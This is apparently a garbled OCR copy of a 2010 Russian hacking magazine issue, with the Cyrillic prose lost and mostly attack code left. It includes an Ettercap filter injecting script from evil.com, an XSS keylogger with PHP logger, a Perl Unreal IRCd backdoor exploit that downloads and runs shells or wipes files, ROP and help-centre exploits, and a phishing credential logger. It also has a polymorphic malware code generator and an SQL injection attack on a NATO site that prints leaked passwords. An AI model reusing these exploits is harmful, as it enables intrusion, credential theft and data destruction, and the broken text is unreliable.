Free Wi-Fi, ,
, ,
AP-, .
Evil Twins ( Rogue AP) 2004
.
,
probe-,
. ,
, ESSID
, ,
, ,
. , : ,
,
. ,
AP,
.
Airdrop-ng ,
AP, ( IP
00:aa:bb:cc:dd:ee):

WARNING

info

.
,
-,
, , -,
.
.

.

a/00:aa:bb:cc:dd:ee|any
d/any|any


Rogue AP.
KARMA 2004 . Metasploit, Karmetasploit
(bit.ly/Karmetasploit)
.
.
Airdrop-ng,
Shmoocon (www.
shmoocon.org/2010/slides/wifibomb.zip). ,
,
. .z

037


GreenDog agrrrdog@gmail.com

Easy Hack

HTTP.
, etag,
.

httprint.

: HTTP

:
][ , / , FTP-
HTTP-. , ,
. HTTP-.
, Server .
. ? . ,
- - .
, -
. RFC /
.
(fingerprint) HTTP-, .
, . ,
() , .
:
HTTP-;
:


-
;

;
.

, , .
,
-.
, , . .
, httprint win/nix BT 4 (net-square.com/
httprint/), httprecon win (computec.ch/projekte/
httprecon/. , :).
.

, , , - - . ,

, .
, - , . , net-square.com/
httprint/httprint_paper.html ServerMask IIS.
- - ( )

www.netcraft.com.
DELETE / HTTP/1.0 ;
GET / HTTP/3.0 ;
GET / LALA/1.0 ;
HEAD / ;

.
( , 100
:)) . shodanhq.com.
ujeni.murkyroc.com/

hmap/. computec.ch/projekte/
httprecon/?s=database.

,
-;
(404, ) ;

038

, HTTP-
HTTP-, .
X 08 /139/ 10

: PHP
.

:
, .
, mod_rewrite (
_).
? , PHP ,
. ,
exploit-db.com. -,
PHP.

:
,
ETTERCAP.

:
.
,
. ,
, .
Ettercap NG.
GUI , .
0.7.3. ettercap.sourceforge.net
nix, . , ,
. :

.
PHP. PHP-,
Fatal Error. :
.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
.php?=SUHO8567F54-D428-14d2-A769-00DA302A5F18

, PHP, ZEND,
, Suhosin ( PHP). PHP.
www.0php.
com/php_easter_egg.php.
, ,
PHP, expose_php=off
php.ini.

PHP
Ettercap, BackTrack 4.
. http_filter.txt
HTTP-.
// TCP, 80
if (ip.proto == TCP && tcp.dst == 80) {

Ettercap NG. .

, , ;
;
Man in the Middle (MitM);
,
.

, Ettercap
.

TCP/IP- .
: -, ; -,
Ettercap HTTP-
, .
, .
X 08 /139/ 10

039

//
if (search(DATA.data, "Accept-Encoding")) {
//
replace("Accept-Encoding", "Blabla-Blahblah");
//
msg("Accept-Encoding field has been changed\n");
}
}
// TCP, 80
if (ip.proto == TCP && tcp.src == 80) {
replace("</body>", " <script type=\"text/javascript\"
src=\"http://evil.com/sploit.js\"></script> \" ");
// HTML-,
-
replace("</html >",
" <img src=\"http://evil.com/evil.gif\"></img>");
msg("Success!\n"); //
}

Ettercap ,
. .
, 80
TCP.
-. Accept-Encoding ( HTTP-, )
( ). ,
Accept-Encoding , -
. HTML-.
- .
.
. .
- ( TCP, 80).
</body>, </html > , -,
. ?

:
.

:

.
- - ( :)).
,
. .
/
( ). , , , ... ,
http://yehg.net/q. ,
( ) .
- ,
. ,
. -, yehg ,
, .
, , whois , / .. ,
. , ,
. - , .
, - (gosu.pl/wsa/). , JavaScript .
.

040

HTML-
,
. , .. : replace
,
, msg ,
, .
Ettercapa . :
etterfilter http_filter.txt -o http_filter.ef

http_filter.txt , -o http_filter.ef ttercap- ( ).


Ettercap.
ettercap -T -F http_filter.ef -M ARP /192.168.0.1/

-T ,
Ettercap; -F http_filter.ef Etterfilter
; -M ARP /192.168.0.1/ Ettercap,
MitM , arp- ( Ettercap
). 192.168.0.1 IP . , arp-
, ARP ,
,
. Ettercap
, HTML . , Ettercap . ,
. , , , ...
man Ettercap . ,
, , ,
, .

.
, - ,
HTML . ,
. :
CATS["General"] = {

xakep.ru

X 08 /139/ 10

"xakep": "http://www.xakep.ru/local/search/search.
asp?text=%s",

};

%s , , .
General xakep.
.
. , , ,

: ,
XSS .

:
XSS : , . , , , , - .
XSS- . ,
, . XSS ! .
XSS?
: JavaScript,
, , . ( )
, , PHP. JavaScript ( insanesecurity.info):
var keys=''; //
document.onkeypress = function(e) {
//
get = window.event?event:e; //
key = get.keyCode?get.keyCode:get.charCode;
//
key = String.fromCharCode(key); //
keys+=key; //
}
window.setInterval(function(){
//
new Image().src = 'http://_:80/keylogger.
php?keys='+keys; //
keys = ''; //
}, 1000);

(vulnerability or vulnerabilities)
OR (exploits or security holes),
.
, YEHG, ,
. ,
.
.
( ), . ,
.

:
,
PHP-, .
PHP-:
<?php
$log= $_SERVER["QUERY_STRING"]."\r\n";
// js
$fp=fopen("log.txt", "a"); //
fputs($fp, $log); //
fclose($fp);
?>

, ,
XSS .

.
.
- sourceforge.
net/projects/jskeylogger/ ( ). 1.4.
. :
, ID
, .
, exe .
PHP, , .
, . . ,
, .
.
, , , , , .
.z

jskeylogger v1.4 : IP, ID,

X 08 /139/ 10

041


, Digital Security a.sintsov@dsec.ru


,
, .
. ,
, ,
. .
state-of-art, , .
,
, .

01


UNREAL IRCD

CVE
CVE-2010-2075
TARGETS
Unreal IRCD v. 3.2.8.1

BRIEF
IRC-
Unreal IRCD. , IRC
. Facebook,
Twitter, .
, IRC - .
/ ( ), ,
, WEB 2.0, ,
(BackDoor ) Unreal IRCD.
IRC-
2009 . ,

. ,
.

EXPLOIT
,
Unreal IRCD, .
Metasploit .
, . ,
,
s_bsc.c, read_
packet(). .
readbuf.
, , ,
, , :
#ifdef DEBUGMODE3
if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))

042

DEBUG3_LOG(readbuf);
#endif


, DEBUGMODE3_INFO (
DEBUGMODE3). ,
DEBUG3_LOG(). ?
, struct.h.
#define DEBUGMODE3 ((x)->flags & FLAGS_NOFAKELAG)
. . .
#ifdef DEBUGMODE3
#define DEBUGMODE3_INFO "AB"
#define DEBUG3_LOG(x) DEBUG3_DOLOG_SYSTEM (x)
. . .
#define DEBUG3_DOLOG_SYSTEM(x) system(x)

:

AB. , system(), .
:
#!/usr/bin/perl
# Unreal3.2.8.1 Remote Downloader/Execute Trojan
# DO NOT DISTRIBUTE -PRIVATE# -iHaq (2l8)
use Socket;
use IO::Socket;
## Payload options
# .
# unix/linux,
AB;.
# ,
# system(); -
# .
my $payload1 = 'AB; cd /tmp; wget http://
X 08 /139/ 10

BlazeDVD. ROP
packetstormsecurity.org/groups/synnergy/bindshellunix -O bindshell; chmod +x bindshell; ./bindshell &';
my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.
com/bot.txt -O bot; chmod +x bot; ./bot &';
my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.
com/r.txt -O rshell; chmod +x rshell; ./rshell &';
my $payload4 = 'AB; killall ircd';
my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr
*';
$host
$port
$type
$host
$port
$type

=
=
=
=
=
=

"";
"";
"";
@ARGV[0];
@ARGV[1];
@ARGV[2];

if ($host eq "") { usage(); }


if ($port eq "") { usage(); }
if ($type eq "") { usage(); }
sub usage {
printf "\nUsage :\n";
printf "perl unrealpwn.pl <host> <port> <type>\n\n";
printf "Command list :\n";
printf "[1] - Perl Bindshell\n";
printf "[2] - Perl Reverse Shell\n";
printf "[3] - Perl Bot\n";
printf "-----------------------------\n";
printf "[4] - shutdown ircserver\n";
printf "[5] - delete ircserver\n";
exit(1);
}
sub unreal_trojan {
my $ircserv = $host;
my $ircport = $port;
#
my $sockd = IO::Socket::INET->new (PeerAddr =>
$ircserv, PeerPort => $ircport, Proto => "tcp") || die
"Failed to connect to $ircserv on $ircport ...\n\n";
print "[+] Payload sent ...\n";
#
if ($type eq "1") {
print $sockd "$payload1";
X 08 /139/ 10

} elsif ($type eq "2") {


print $sockd "$payload2";
} elsif ($type eq "3") {
print $sockd "$payload3";
} elsif ($type eq "4") {
print $sockd "$payload4";
} elsif ($type eq "5") {
print $sockd "$payload5";
} else {
printf "\nInvalid Option ...\n\n";
usage();
}
close($sockd);
exit(1);
}
unreal_trojan();
# EOF

SOLUTION
, ,
, , MD5-
. 752e46f2d873c1679fa9
9de3f52a274d, 7b741e94e867c0a7370553fd015
06c66. IRC-
( - ,
).

02


BLAZEDVD PLAYER

CVE
N/A
TARGETS
BlazeDVD Player 5.1
BRIEF
,

. , Windows 7,
, DEP ASLR. -,
mr_me, (Steven Seeley). ,
, ,
( https://net-ninja.net). ,
Corelan Security Team, ,

043

Acrobat Reader. . SWF- PDF

corelanc0d3r, 10- ,
, - . ,
.
BlazeDVD.

EXPLOIT
cst-blazedvd.plf, BlazeDVD Player
MessageBoxA ,
:). Windows 7 . -, ,
( ) ,
.
MessageBox ,
Windows 7
. ,
( SEH ),
- , ,
VirtualProtect, -
(VirtualProtect/MessageBox).
, , ROP, .
,
.
,
- .
RETN,
, .
, . mr_me
, , ASLR
. ,
ASLR,
( ROP, Forb
( . .)). ROP . :
SEH
. ROP .
mr_me
. (,
) :
0x616074AE : ADD ESP, 408
0x616074B4 : RETN 4
; ,

, ROP- , RETN
4 , mr_me.
ROP ,

044

( ... , , ...)
- . . ROP
. , , .

SOLUTION
, .
. ,
, /dinamicbase /
GS- . SehOP
,
.

03


FLASH PLAYER

CVE
CVE-2010-1297
TARGETS
Adobe Acrobat Reader < 9.4
Adobe Flash Player < 10.1
BRIEF
0day-
Adobe. ?
SWF Flash. , , , Acrobat Reader. ,
-,
. Metasploit. ...

EXPLOIT
, ,
, SWF-,
, AES-PHP.swf, . , ,
- 0x66 (GetProperty)
X 08 /139/ 10

<---- 0x0C0C0C0C+0x8 = EAX+8 (1)


0x700156f,
# mov eax,[ecx+0x34] / push [ecx+0x24] /
call [eax+8] ;( 1)
0xcccccccc,
0x7009084,
# ret ( 4)
0x7009084,
# ret ( 5)
0x7009084,
# ret ( 6)
0x7009084,
# ret ( 7)
0x7009084,
# ret ( 8)
0x7009084,
# ret ( 9)
0x7009033,
# ret 0x18 ( 10)
0x7009084,
# ret
0xc0c0c0c,
# <---- 0x0C0C0C0C+0x34, ESP (2)
0x7009084,
# ret
0x7009084,
# ret
0x7009084,
# ret
0x7009084,
# ret
0x7009084,
# ret ( 11)
0x7009084,
# ret ( ROP)
....

Acrobat Reader. heap-spray

- 0x40 (newfunction). ,
.
, SWF-, PDF heap-spray
JavaScript. , . , DEP,
ROP-,
.
ROP-
. ( - newfunction)
ECX 0x0C0C0C0C, call [ecx+0c]. ,
heap-spray.
, 0x0C0C0C0C
+ 0xC : 0x700156f.
call 0x700156f. BIB.dll
:
mov eax,[ecx+0x34]
; ECX heap-spray (0x0C0C0C0C)
; 0x0C0C0C0C+0x34
0x0C0C0C0C
; EAX
push [ecx+0x24]
call [eax+8]
; 0x0C0C0C0C+0x8 0x70048ef

0x70048ef , :
xchg eax,esp
ret

; EAX=0x0C0C0C0C, ESP
;

heapspray.
( 4 ,
0x0C0C0C0C).
0x7004919,
# pop ecx / pop ecx / mov [eax+0xc0],1 /
pop esi / pop ebx / ret ;( 3)
0xcccccccc,
0x70048ef,
# xchg eax,esp / ret ;( 2)
X 08 /139/ 10

, - RETN.
CALL JMP,
-.

SOLUTION
Flash 10.1 , -
. , BIB.dll,
, , ASLR,
Windows 7
.

04


WINDOWS HELP CENTRE

CVE
CVE-2010-1885
TARGETS
Windows XP
BRIEF
, . (Tavis
Ormandy), , , ,
.
0day JAVA Deployment Tool Kit, Windows XP, , .
,
, . Microsoft' ,
, , .
,
.
.
Microsoft - ,
Google . , ? .
, ,
security-research. Google

045

,
. REF , ,
PARAM name="HTMLView"
starthelp.html:

Windows Help Center. .

; , , .
. Immunity
, , , , ,
.
, ...
, . ,
. .
NO MORE FREE BUGS. ,

, .
...

EXPLOIT
(helpctr.exe), , URL ,
hcp://.
, . , , , .
, XSS .
hcp://system/sysinfo/sysinfomain.htm?svr=<h1>test</
h1>

,
: : <script
defer>eval(unescape
('Run("calc.exe")'))</script>. - IE8
.
Windows Media Player... , ... ,
, ,
ActiveX. URL,
, ASX-, ,
, , , :
<ASX VERSION="3.0">
<PARAM name="HTMLView"
value="http://ZLOI-URL/starthelp.html"/>
<ENTRY>
<REF href="http://ZLOI-URL/bug-vs-feature.jpg"/>
</ENTRY>
</ASX>

046
46

<iframe src="hcp://services/search?query=anything&
topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.
htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%
28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/
script%3E">


, . ,
hex' unescape-, .
, IE7 -
... . Media Player'
- , :
<html><head><title>Testing HCP</title></head>
<body><h1>OK</h1>
<script>
// HCP:// Vulnerability, Tavis Ormandy, June 2010.
var asx = "http://ZLOI-URL/simple.asx"; //
// IE, asx.
if (window.navigator.appName
== "Microsoft Internet Explorer") {
// Internet Explorer
var o = document.createElement("OBJECT");
o.setAttribute("classid",
"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
o.openPlayer(asx); //!
// IE, asx ,
// ,
// ...
} else {
// Mozilla, Chrome, Etc.
var o = document.createElement("IFRAME");
o.setAttribute("src", asx);
document.body.appendChild(o); //!
}
</script>
</body></html>

, , ZLOI-URL.

SOLUTION
hcp ( HKCR\HCP\shell\open)
.
http://lock.cmpxchg8b.com/
b10a58b75029f79b5f93f4add3ddf992/hcphotfix.zip.
helpctr.exe, .
Microsoft. z
X 08 /139/ 10


. ,
, , - 5
, WiFi-
( ). , ,
, ,
. , , ,
, ,
. ,
. , ,
-.
:
, ( , ). ,
, .
- ,
WiFi-, , , .

, . -,
: , !, X 08 /139/ 10

.. ..
, .
, , (
. .) -
-
.
, , ,
. ,
, ( 10
) .
? , ,
(
!).

047

, ,

ARP- IP

DVD
dvd

,



(MACChange,
Small HTTP Server,
WireShark
, Ufasoft
Sniffer, InterCepter),
PHP-,

WARNING
warning


!
,

048

- ,
.
,
( ).
:).
( ,
, ..).

... !

, , WireShark
.
SSL- ...
, :
WEP/WPA-,
.
(
SMS- ), ,
, , .
, SSL-

, XOR
( Ufasoft Sniffer
InterCepter) ,
( ... :).
( ,
IP- , ).
, , , (
!) - (
:). IP MAC-,
( ARP-),
.
,
, .
,
:).
, MACChange ( , ) .
IP.
. , ,

DHCP-, Static-. ,
,
. , !

, ?..

, , .
, ? MitM-, .
.
: -,
.
, DIR-300 DHCP-.
SSID
.
-
Small HTTP Server.
.
, ,
.
WEB- DNS-, - -
HTML-, .
PHP-, txt-.
<?php
$filename = 'S:\home\localhost\www\info.txt';
$a = $_GET['login'];
$b = $_GET['password'];
$somecontent = " -- - \n".$a." -- - \n".$b." -- \n";
//

if (is_writable($filename))
if (!$handle = fopen($filename, 'r+'))
{
echo " ($filename)";
exit;
}
if (!fwrite($handle, $somecontent))
{
X 08 /139/ 10

MACChange. -

echo " ($filename)";


exit;
}
else{echo " ";}
echo " ($somecontent) ($filename)";
fclose($handle);
}
else {
echo " $filename ";
}
?>

, !

MITM

:
.

SSID, .
, .
,
.
. , , .

PHP- .

(, , :) . .).
,
: ,
, ,
, .
. ! , ,
: -
.
SSL- .

? , ( ).
.

, .
,
,
(, , ).
:
, ,
(
VPN-),
. z

txt-

X 08 /139/ 10

049


ANTI-NATO natobreak@yahoo.com

, , ,
-.
. ,
, .
. ,
. , , , .
,
, , ( ).
, .
, SQL-,
XSS, LFI/RFI ,
.
,
.
, , ,
, -
. ,
( Acunetix, nikto, w3af sqlmap)

050

-. , ,

,
, .
, , , ,
?
, .

, , , -
, -
, .
( ) ,
, .
, ,
- .
X 08 /139/ 10

,


, Research & Technology Organisation (RTO),
.

. - , , , , .
, ?

-
. -,
- ,
. , ,
, ,
- RTO.NATO.INT. ,
,
, ,
.
,
.
, robots.txt:
User-agent: *
Disallow: /images/
Disallow: /img/
Disallow: /homepix/
Disallow: /rndimg/
Disallow: /Include/
Disallow: /hpix/
Disallow: /Mailer/
Disallow: /InfoPack/
Disallow: /aspx/
Disallow: /bin/
Disallow: /cgi-bin/
Disallow: /ContactUs.aspx
Disallow: /Copyright.htm
Disallow: /css/
Disallow: /Detail.asp
Disallow: /enrolments/
Disallow: /FAQ.htm
Disallow: /foad.htm
Disallow: /fr/
Disallow: /help.htm
Disallow: /pfp.ppt
...
Disallow: /Prog/
Disallow: /Reports.asp
Disallow: /SendAbstractDetails.aspx
Disallow: /tor.asp
X 08 /139/ 10

Disallow: /Taxo/
Disallow: /Variables.asp
Disallow: /variables.asp
Disallow: /voc.htm
Disallow: /vpn.html
Disallow: /Webmail.asp
Disallow: /yourws.asp
Sitemap: http://www.rto.nato.int/sitemap.xml

2010 , RTO
, (pfp.ppt).
nikto ,
-? ,
nikto , :
- Nikto v2.03/2.04
----------------------------------------------------+ Target IP:
62.23.200.67
+ Target Hostname:
www.rto.nato.int
+ Target Port:
80
+ Start Time:
2010-05-08 14:00:15
----------------------------------------------------+ Server: RTA Web Server
- /robots.txt - contains 47 'disallow' entries which
should be manually viewed. (GET)
- Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE'
is typically only used for debugging and should be
disabled. This message does not mean it is vulnerable
to XST.
- Public HTTP Methods: OPTIONS, TRACE, GET, HEAD,
POST
+ OSVDB-877: HTTP method ('Public' Header): 'TRACE'
is typically only used for debugging and should be
disabled. This message does not mean it is vulnerable
to XST.
+ OSVDB-0: ETag header found on server, fields:
0x7036cddda14ca1:18b2
+ OSVDB-3092: GET /sitemap.xml : This gives a nice
listing of the site content.
+ 3577 items checked: 49 item(s) reported on remote
host
+ End Time:
2010-05-08 14:49:54 (2979 seconds)
----------------------------------------------------+ 1 host(s) tested
Test Options: -Cgidirs all -vhost www.rto.nato.int
-host www.rto.nato.int www.rto.nato.int
-----------------------------------------------------

051

, , Windows , LFI

- ( ,
, nikto :)),
. , , webmail.
a sp ,
Detail.asp -.
disallow
robots.txt, webscarab.
,
sqlmap' w3af'. ,
, , topics. ,
:
http://www.rto.nato.int/Main.asp?topic=Main.asp

, .ASP, (, Main.asp



1990- .
,
( ,
, ,
, ).
, .
,

. ,
, . ,

.
,
.

052

- BASE64

topic, - ,
Main.asp ,
pfp.ppt,
.
... . , , :
http://www.rto.nato.int/Main.asp?topic=../../../../..
/../../../../../../etc/passwd

ORACLE , ORACLE

, -, - Oracle,
SQL- XSS.
Oracle -
( ),
SQL-. , - X 08 /139/ 10

(
). SQL-
, -,
.
. ,
+or+chr(77)=chr(77). chr() ,
.
RTO. , ,
:
:
http://www.rto.nato.int/Detail.asp?ID=1+or+chr(77)=chr(77)
Oracle:
http://www.rto.nato.int/Detail.asp?ID=1+or+1=(SELECT+1+FROM+DUAL)

, ,
(backend) Oracle, MySQL SQLite (,
SQL-
). , Oracle
. !
.
, ,
. ,
,
Perl.
,
,
:
) :
http://www.rto.nato.int/Detail.
asp?ID=-1+OR+(select+length(table_
name)+from+user_tables+where+'%
X 08 /139/ 10

%'+AND+rownum=1)=% , %

) (
):
http://www.rto.nato.int/Detail.asp?ID=1+OR+(select+substr(column_name,%
%,1)+from+all_tab_columns+where+table_
name='.% %.'+AND+'%
%'+AND+rownum=1)=chr(% %)

,
, rownum
SQL- Oracle,
.
:). , ,
( )
Oracle. ,
,
PASSWORD. c
.
, :).

:
RTO_MEMBERS.MEMBER_PASSWORD
RTO_PANEL.PANEL_PASSWORD
USER_DB_LINKS.PASSWORD
CONTACTLOGIN.CLO_PASSWORD
APPLICATIONLOGIN.PASSWORD
CONTACT.CLO_PASSWORD

, , ,
.
USERNAME: RTAMASTER
PASSWORD: droopy
DB_LINK: TEST.RTA.INT
USERNAME: WISE

053

Main.asp
PASSWORD: BUGSBUNNY
DB_LINK: WISE_LINK

,
. , ,
.

:
DB Scanning table rto_panel
..........[DBG: FOUND NUMBER 29.]
DB NUMBER OF ROWS FOUND: 29
Getting row 1
DB getting panel_webname
.......[DBG: FOUND NUMBER 1.]
.........[DBG: FOUND SYMBOL ' ' - 32]
DB
DB getting panel_password
.......[DBG: FOUND NUMBER 16.]
........[DBG: FOUND SYMBOL '' - 245]
........[DBG: FOUND SYMBOL '' - 191]
. . .
.........[DBG: FOUND SYMBOL '$' - 36]
.........[DBG: FOUND SYMBOL '' - 168]
DB )z54<!*t$
DB 245|191|201|41|122|24|60|198|33|196|42|192|116|164
|36|168|
DB getting panel_number
.......[DBG: FOUND NUMBER 7.]
.........[DBG: FOUND SYMBOL 'R' - 82]
. . .
........[DBG: FOUND SYMBOL 'A' - 65]
DB RTA-CSA
DB getting panel_alias
.......[DBG: FOUND NUMBER 7.]
. . .

054

........[DBG: FOUND SYMBOL 'A' - 65]


DB RTA-CSA

"panel_webname"
"panel_password", MD5 .
. , , .

- , RTO.
"SINGLE SIGN-ON",

:
Please authenticate to access website protected areas
and the RTO collaborative environment. Use your RTO
collaborative environment credentials or the RTO
generic credentials to log on.

, , ,
/.
, ( ) . ,
,
RTO.NATO.INT.
,
, ?
. ,

JavaScript-. ,
, HTML md5.js, MD5
RSA Data Security (, ,
). X 08 /139/ 10

pw2md5(in_pw, out_md5),
:
<form action="checkident.asp" method="post"
name="frmlogon" onSubmit="return sendData();">
. . .
. . .
function sendData()
{
var FORM = document.frmlogon;
pw2md5(FORM.MemberMatkhau,FORM.MemberMatkhau);
return true;
}

pw2md5().
, MD5 , 16- BASE64-
.
md5.js:
/*
* A JavaScript implementation of the RSA Data
Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 2.1 Copyright (C) Paul Johnston 1999 2002.
* Other contributors: Greg Holt, Andrew Kepert,
Ydnar, Lostinet
* Distributed under the BSD License
* See http://pajhome.org.uk/crypt/md5 for more info.
*/
. . .
. . .
/*
* Util method added by minhnn
*/
function pw2md5(password, md5password) {
md5password.value = b64_md5(password.value) + "==";
// password.value = "";
}

,
MD5!
! - BASE64,
MD5 .
motobit.com, :
USERNAME: IST
PASSWORD: AD2F38AEE7B3162D832624DA76983CD2
BASE64: rS84ruezFi2DJiTadpg80g==

X 08 /139/ 10

- Mozilla Firefox TamperData, POST-


MD5 , . , TamperData... , ,
... , , ,
!. , !

, !

, , SQL
, . Oracle
, SQLite MySQL (
, Oracle , iDefense Labs, ,
).
, XDB.
XDB_PITRIG_PKG.PITRIG_DROPMETADATA, .
10g , Oracle
. ,
, :
declare
a varchar2(32767);
b varchar2(32767);
begin
a:='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
b:='YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY';
a:=a||a; a:=a||a; a:=a||a; a:=a||a; a:=a||a;
a:=a||a;
b:=b||b; b:=b||b; b:=b||b; b:=b||b; b:=b||b;
b:=b||b;
XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(a, b);
end;

,
,
.


, , . ,

, , , .
. , ,
(
), .
, -
:). , -,

. ? z

055


HellMilitia and my Death icq 884888, http://snipper.ru

, , ,
: ( ), ( ),
(
), ( , ), ( , patch'), .
, , ,
; ...
, !

0XBA11EE PRNG


. ,
ANSI C, .
rndseed = 100500

,
,
,
.

, .

-
FASM,
?
,

.

, ,

.
.
, , timestamp, UNIX-.
: randseed = %t. , ,
0 - 0xDEAD, :
randomize
random_number = rndnum mod 0xDEAD - 1

0XBADC0DE

,
int. int 0xCD
, . :
randomize
int_val = rndnum mod 0xFF

macro randomize {
randseed = randseed * 1103515245 + 12345
randseed = (randseed / 65536) mod 0x100000000

db 0xCD
db num

rndnum = randseed and 0xFFFFFFFF


}

, , , ,

056

. 4 gen_int
, , : rept 7 { gen_int }.
:
X 08 /139/ 10

macro freereg {
RREG = NOREG
while (RREG = RESP) | (RREG = REBP) | (RREG = -1)
| (RREG = USEDREG1) | (RREG = USEDREG2)
randomize
RREG = rndnum mod 8
end while
}

cd78
cda6
cdb4
cd36
cdec
cd6a
cd68

|
|
|
|
|
|
|

int
int
int
int
int
int
int

0x78
0xa6
0xb4
0x36
0xec
0x6a
0x68

rept fasm' . -,
, .
lea;
. , :
REAX
RECX
REDX
REBX
RESP
REBP
RESI
REDI

=
=
=
=
=
=
=
=

0
1
2
3
4
5
6
7

;
;
;
;
;
;
;
;

AL
CL
DL
BL
AH
CH
DH
BH

, .
, :
NOREG
USEDREG1
USEDREG2
RREG

=
=
=
=

-1
NOREG
NOREG
NOREG

,
.
, , . .
macro rndreg {
RREG = NOREG
while (RREG = NOREG) | (RREG = RESP) | (RREG = REBP)
randomize
RREG = rndnum mod 8
end while
}

, Esp Ebp , . , :
X 08 /139/ 10

Esp Ebp , .
, .
( ,
), . lea, , ,
\ . , ?
Entry Point - (Entry Point + ), , ,
0x1000.
. ,
lea , :
macro gen_lea {
freereg
reg = (RREG * 8) + 5
randomize
address = (rndnum mod ((ENTRY_POINT + 0x1000 + 1)
- ENTRY_POINT)) + ENTRY_POINT
db 0x8D
db reg
dd address
}

ENTRY_POINT :
entry start
...
start:
ENTRY_POINT = $

, : ENTRY_POINT = $$. , :
8d3db10a4000
8d154c044000
8d1d68054000
8d05e7024000
8d15db0e4000
8d15670f4000

|
|
|
|
|
|

lea
lea
lea
lea
lea
lea

edi,
edx,
ebx,
eax,
edx,
edx,

[0x400ab1]
[0x40044c]
[0x400568]
[0x4002e7]
[0x400edb]
[0x400f67]

, , .
,
,
FPU:
macro gen_fpu {
randomize
type = rndnum mod 0x2F
db 0xD8
db 0xC0 + type
}

057

XOR_KEY, , .
randomize
XOR_KEY = rndnum mod 0xFF


d8d1
d8c9
d8d4
d8ed
d8d6
d8c2

|
|
|
|
|
|

fcom st0, st1


fmul st0, st1
fcom st0, st4
fsubr st0, st5
fcom st0, st6
fadd st0, st2

! , gen_trash,
.
, ,
. , / .
, , :
macro gen_trash length {
repeat length
randomize
variant = randseed mod VARIANTS
if variant = 0
gen_lea
else if variant = 1
gen_fpu
end if
end repeat
}

10 :
gen_trash 10. ,
. \: ; ; (
FPU- ,
? lea, ? ).
,
, .
gen_trash. ,
:
gen_trash 15
mov eax, .CodeStart
USEDREG1 = REAX
gen_trash 27
mov ecx, CodeSize
USEDREG2 = RECX
gen_trash 20
.again:
xor byte[eax], XOR_KEY
gen_trash 37
inc eax
gen_trash 10
loop .again
gen_trash 43

058


, ,
. , \
, , , , ,
lea eax,[ ecx*4+100 ]... !.. ,
, .

, .

0XACED1A


. , .
,
gen_trash, . ,
.
macro adbg {
randomize
variant = rndnum mod N
randomize
destination = (rndnum mod ((ENTRY_POINT + 0x1000)
- ENTRY_POINT)) + ENTRY_POINT
if vatiant = 0
invoke IsDebuggerPresent
test eax,eax
jnz $+destination
else if variant = N
.....
}

. .

0XACE API-

, .
Windows API.
, .
API-:
macro gen_trash_api {
randomize
RandomParam1 = rndnum mod 0xFFFFFFFF
randomize
RandomParam2 = rndnum mod 0xFFFFFFFF
randomize
variant = rndnum mod 4
if variant = 0
invoke IsBadReadPtr,RandomParam1,RandomParam2
else if variant = 1
invoke IsBadWritePtr,RandomParam1,RandomParam2
else if variant = 2
invoke IsBadCodePtr,RandomParam1
else if variant = 3
invoke GetLastError
end if
}

, API- Eax, Ecx


X 08 /139/ 10

mov
push arg2
mov arg1,[esp]
add esp,4
else if variant = 2
push arg2
xchg arg1,arg2
pop arg2
else if variant = 3
mov arg1,arg2
end if
else
mov arg1,arg2
end if


Edx. ,
.
gen_trash. ;
, . , .
, :

:
macro GetLastError {
rnd
variant = rndnum mod 2
if variant = 0
mov eax,[fs:18h]
mov eax,[eax+TEB.LastError]
else if variant = 1
invoke GetLastError
end if
}

0XA11A5,

. FASM
, . , , mov
reg32_1, reg32_2. ? ,
( ):
push reg32_2
pop reg32_1
push reg32_2
mov reg32_1,[esp]
add esp,4
push reg32_2
xchg reg32_1,reg32_2
pop reg32_1

, ,

. ,
mov. , ,
:
macro mov arg1,arg2 {
if (arg1 eqtype eax) & (arg2 eqtype eax)
rnd
variant = rndnum mod 4
if variant = 0
push arg2
pop arg1
else if variant = 1

X 08 /139/ 10

mov eax,ecx
mov ecx,ecx
mov edx,esp

:
51
91
59
89e5
53
59

|
|
|
|
|
|

push ecx
xchg ecx, eax
pop ecx
mov ebp, esp
push ebx
pop ecx

, ?
, .

0XAB1E,

.
.
, .
, , . : , ,
,
. ( , ),
:
fproc_1 = 0
fproc_2 = 0
...
entry $
;
...
while (flag_1 = 0) | (flag_2 = 0)
randomize
sequence = rndnum mod 2
if sequence = 0
if flag_1 = 0
proc_1

059


RAZ0R HTTP://RAZ0R.NAME

push destination - value


add [esp],value
jmp [esp]
else if variant = 1
randomize
value = rndnum mod (0xFFFFFFFF - IMAGE_BASE
- 0x1000)
push destination + value
sub [esp],value
jmp [esp]
end if


,
,

}
macro o_label name {
label name
add esp,4
}

:
flag_1 = 1
end if
else if sequence = 1
if flag_2 = 0
proc_2
flag_2 = 1
end if
end if
end while
macro proc_1 {
proc AnyProcedure1
...
ret
endp
}
macro proc_2 {
proc AnyProcedure2
....
ret
endp
}

, ,
, , .

0XDEFACED, :


. , :
push label - value
add [esp],value
jmp [esp]
....
label:
add esp,4;

, , , , . o_jmp olabel:
macro o_jmp destination {
randomize
